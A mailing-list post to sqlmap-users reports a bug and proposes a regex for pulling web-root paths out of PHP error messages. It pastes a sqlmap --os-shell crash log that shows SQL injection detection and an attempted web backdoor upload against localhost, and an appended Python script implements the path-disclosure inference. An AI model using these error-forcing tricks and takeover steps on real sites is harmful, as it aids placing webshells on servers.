[sqlmap-users] A bug and a suggestion
From: Stuffe <stu...@gm...> - 2009-07-29 16:22:37
I just fired up the version of sqlmap, but it couldn't find the web root, although it should be simple to do. A simple regex could identify all PHP errors; they all start like <b>Parse error</b>:, <b>Notice</b>:, <b>Warning</b>:, <b>Fatal error</b>: etc. After that comes some random crap and then comes the URL you are looking for, inside a <b> tag, e.g. <b>C:\wamp\www\index.php</b>. Here are some examples:

  <b>Notice</b>: Undefined index: b in <b>C:\wamp\www\index.php</b> on line <b>12</b>
  <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>C:\wamp\www\index.php</b> on line <b>14</b>
  <b>Parse error</b>: parse error, expecting `'('' in <b>C:\wamp\www\index.php </b> on line <b>28</b>

As you can see, they are not hard to extract with a regex. And they can often be generated, if you insert something that breaks the SQL query or by typecasting a GET var as an array (like index.php?a[]=now_a_becomes_an_array) or other tricks.

Anyway, when the error message is found, it should be checked whether or not the last part of the URL is equal to the last part of the internal path; if they are equal, you know the webroot. E.g. http://example.com/whatever/index.php gives the error:

  <b>Notice</b>: Undefined index: b in <b>C:\wamp\www\whatever\index.php</b> on line <b>12</b>

You replace \ with / and compare http://example.com/whatever/index.php with C:/wamp/www/whatever/index.php and find that C:/wamp/www/ must be the webroot.

Now I don't know if or how sqlmap is trying to retrieve the webroot, but it wasn't able to find these things in my tests (even though they were all over the place).

Anyway, it also crashed on me when I tried to upload a webshell:

C:\Documents and Settings\Administrator>"C:\Documents and Settings\Administrator\Desktop\sqlmap-0.7_exe\sqlmap.exe" -u http://localhost/?a=1 --os-shell

    sqlmap/0.7 by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 17:37:18

[17:37:18] [INFO] testing connection to the target url
[17:37:18] [INFO] testing if the url is stable, wait a few seconds
[17:37:19] [INFO] url is stable
[17:37:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[17:37:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[17:37:20] [INFO] testing if GET parameter 'a' is dynamic
[17:37:20] [INFO] confirming that GET parameter 'a' is dynamic
[17:37:20] [INFO] GET parameter 'a' is dynamic
[17:37:20] [INFO] testing sql injection on GET parameter 'a' with 0 parenthesis
[17:37:20] [INFO] testing unescaped numeric injection on GET parameter 'a'
[17:37:20] [INFO] confirming unescaped numeric injection on GET parameter 'a'
[17:37:20] [INFO] GET parameter 'a' is unescaped numeric injectable with 0 parenthesis
[17:37:20] [INFO] testing for parenthesis on injectable parameter
[17:37:20] [INFO] the injectable parameter requires 0 parenthesis
[17:37:20] [INFO] testing MySQL
[17:37:20] [INFO] confirming MySQL
[17:37:20] [INFO] retrieved: 9
[17:37:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.9
back-end DBMS: MySQL >= 5.0.0

[17:37:20] [INFO] testing stacked queries support on parameter 'a'
[17:37:20] [INFO] detecting back-end DBMS version from its banner
[17:37:20] [INFO] retrieved: 5.1.33
[17:37:20] [WARNING] the web application does not support stacked queries on parameter 'a'
[17:37:20] [INFO] going to upload a web page backdoor for command execution
[17:37:20] [INFO] fingerprinting the back-end DBMS operating system
[17:37:20] [INFO] retrieved: c
[17:37:20] [INFO] the back-end DBMS operating system is Windows
[17:37:20] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/Inetpub/wwwroot/]: C:/wamp/www/
[17:37:46] [INFO] retrieved web server full paths: 'C:\wamp\www, C:\'
please provide any additional web server full path to try to upload the agent [C:/Inetpub/wwwroot/test/]: C:/wamp/www/test/
[17:37:51] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP
[2] PHP (default)
[3] JSP
> 2
[17:37:53] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sql...@li...urceforge.net. The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6.1
Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 84, in main
  File "lib\controller\controller.pyc", line 263, in start
  File "lib\controller\action.pyc", line 140, in action
  File "plugins\generic\takeover.pyc", line 295, in osShell
  File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit
  File "lib\request\connect.pyc", line 131, in getPage
  File "urllib2.pyc", line 124, in urlopen
  File "urllib2.pyc", line 383, in open
  File "urllib2.pyc", line 401, in _open
  File "urllib2.pyc", line 361, in _call_chain
  File "urllib2.pyc", line 1130, in http_open
  File "urllib2.pyc", line 1087, in do_open
  File "httplib.pyc", line 656, in __init__
  File "httplib.pyc", line 668, in _set_hostport
InvalidURL: nonnumeric port: '80\test'

[*] shutting down at: 17:37:53
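The path-disclosure check the poster describes, written out as an added example (this is not sqlmap's code, nor the poster's; it is an illustration of the technique from a response-scanning angle). It parses the PHP html_errors format quoted above, aligns the disclosed filesystem path with the request URL from the right, and reports the document root that the leak implies, which is exactly what an attacker learns from such an error and what a defender's response scanner should flag. The function names (`extract_error_paths`, `infer_webroot`, `scan_response`), the regex, and the sample URL and HTML are assumptions constructed from the examples in the post; the sample handles the trailing-space case from the Parse error line and falls back to None when the disclosed file is not under the URL path at all.

```python
import re
from urllib.parse import urlparse

# Shape of PHP's html_errors output as quoted in the post; the regex itself is a
# hypothetical one written to match those samples, not taken from any project:
#   <b>Notice</b>: Undefined index: b in <b>C:\wamp\www\index.php</b> on line <b>12</b>
PHP_ERROR_RE = re.compile(
    r"<b>(?P<level>Parse error|Notice|Warning|Fatal error)</b>:\s*"
    r"(?P<message>.*?)\s+in\s+<b>(?P<path>[^<]+?)\s*</b>",
    re.DOTALL,
)


def extract_error_paths(html):
    """Return every (error level, disclosed filesystem path) pair found in a response body."""
    return [(m.group("level"), m.group("path").strip())
            for m in PHP_ERROR_RE.finditer(html)]


def infer_webroot(url, disclosed_path):
    """Align the request URL's path with the disclosed filesystem path from the right.

    Every trailing component that matches belongs to the URL-visible tree; whatever is
    left on the filesystem side is the document root. Returns None when not even the
    script name lines up (e.g. the leaked path is an include outside the web tree).
    """
    url_parts = [p for p in urlparse(url).path.split("/") if p]
    fs_path = disclosed_path.replace("\\", "/")          # the "\ -> /" step from the post
    fs_parts = [p for p in fs_path.split("/") if p]
    # Windows filesystems are case-insensitive, so fold case when a drive letter is present.
    fold = str.lower if re.match(r"^[A-Za-z]:", fs_path) else (lambda s: s)
    matched = 0
    while (matched < len(url_parts) and matched < len(fs_parts)
           and fold(url_parts[-1 - matched]) == fold(fs_parts[-1 - matched])):
        matched += 1
    if matched == 0:
        return None
    root_parts = fs_parts[:len(fs_parts) - matched]
    prefix = "/" if fs_path.startswith("/") else ""      # keep the leading slash on Unix paths
    return prefix + "/".join(root_parts) + "/"


def scan_response(url, html):
    """Report every path disclosure in a response together with the web root it implies."""
    return [{"level": level, "path": path, "webroot": infer_webroot(url, path)}
            for level, path in extract_error_paths(html)]


# Constructed sample: the three error lines from the post, as PHP would emit them for a
# request to /whatever/index.php whose query string casts 'a' to an array.
SAMPLE_URL = "http://example.com/whatever/index.php?a[]=1"
SAMPLE_HTML = (
    "<br />\n<b>Notice</b>:  Undefined index: b in "
    "<b>C:\\wamp\\www\\whatever\\index.php</b> on line <b>12</b><br />\n"
    "<b>Warning</b>:  mysql_fetch_array(): supplied argument is not a valid MySQL "
    "result resource in <b>C:\\wamp\\www\\whatever\\index.php</b> on line <b>14</b><br />\n"
    "<b>Parse error</b>: parse error, expecting `'('' in "
    "<b>C:\\wamp\\www\\whatever\\index.php </b> on line <b>28</b><br />\n"
)

if __name__ == "__main__":
    for finding in scan_response(SAMPLE_URL, SAMPLE_HTML):
        print(f"{finding['level']:<12} {finding['path']:<40} webroot={finding['webroot']}")
```

Run as a script it prints one line per disclosed path, each resolving to C:/wamp/www/. The right-to-left alignment is what makes the comparison safe against a URL rewritten above the script (e.g. /whatever/ mapped onto a deeper directory): only the components that actually agree are stripped, and a leak that shares no suffix with the URL is reported without a web root rather than with a wrong one. A request for a directory index (URL path ending in /) has no script name to align and likewise yields None.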